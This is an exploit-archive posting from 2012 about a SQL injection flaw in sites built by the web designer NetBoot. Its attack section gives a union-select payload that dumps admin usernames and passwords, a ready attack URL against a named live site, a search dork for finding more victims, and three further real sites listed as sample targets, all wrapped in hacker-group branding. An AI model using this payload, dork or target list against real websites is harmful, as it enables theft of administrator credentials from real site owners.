NetBoot SQL Injection

NetBoot SQL Injection: Posted Oct 20, 2012; Authored by Taurus Omar; Sites designed by NetBoot suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.; tags | exploit, remote, sql injection; SHA-256 | cf004ef90425b9d333afd5ab881acf46aea6d456eb30cb0ce543bb088e17aef4; Download | Favorite | View

NetBoot SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|                 NetBoot - SQL Injection Vulnerability                  |    
--------------------------------------------------------------------------
+----------------| ABOUT ME |--------------------+
NAME:     TAURUS OMAR                            -
HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
TWITTER:  @taurusomar_                           -
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
E-MAIL:   omar-taurus[at]live[dot]com            -
PWNED:    #ZUUU                                  -
+------------------------------------------------+

# Exploit Title: NetBoot - SQL Injection Vulnerability
# Vendor Name: Netboot
# Url Vendor: http://www.netboot.ro/
# Category: WebApps 
# Type: php
# Dork: intext:"Designed by Netboot"
# 0day exploits : 1337day.com Inj3ct0r Exploit DataBase  


# Exploit 
null union all select 1,concat(username,0x3a,parola),3,4,5,6 from admin--

# Example
http://www.soros.ro/ro/program.php?program=null%20union%20all%20select%201,concat%28username,0x3a,parola%29,3,4,5,6%20from%20admin--


# Samples/Demo 
http://www.horizonvita.com/en/produs_detalii.php?id=14'
http://www.uzinexport.ro/company_news_detail.php?news=5'
http://www.soros.ro/ro/program.php?program=13'

# 1337day.com [2012-18-19]

Top Authors In Last 30 Days

Red Hat 200 files
Ubuntu 105 files
indoushka 31 files
Debian 23 files
CraCkEr 15 files
Gentoo 14 files
Google Security Research 12 files
Mirabbas Agalarov 9 files
Apple 8 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,758)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,866)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,370)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,652)
UNIX (9,246)
UnixWare (186)
Windows (6,557)
Other

NetBoot SQL Injection

NetBoot SQL Injection

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

NetBoot SQL Injection

Share This

NetBoot SQL Injection

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems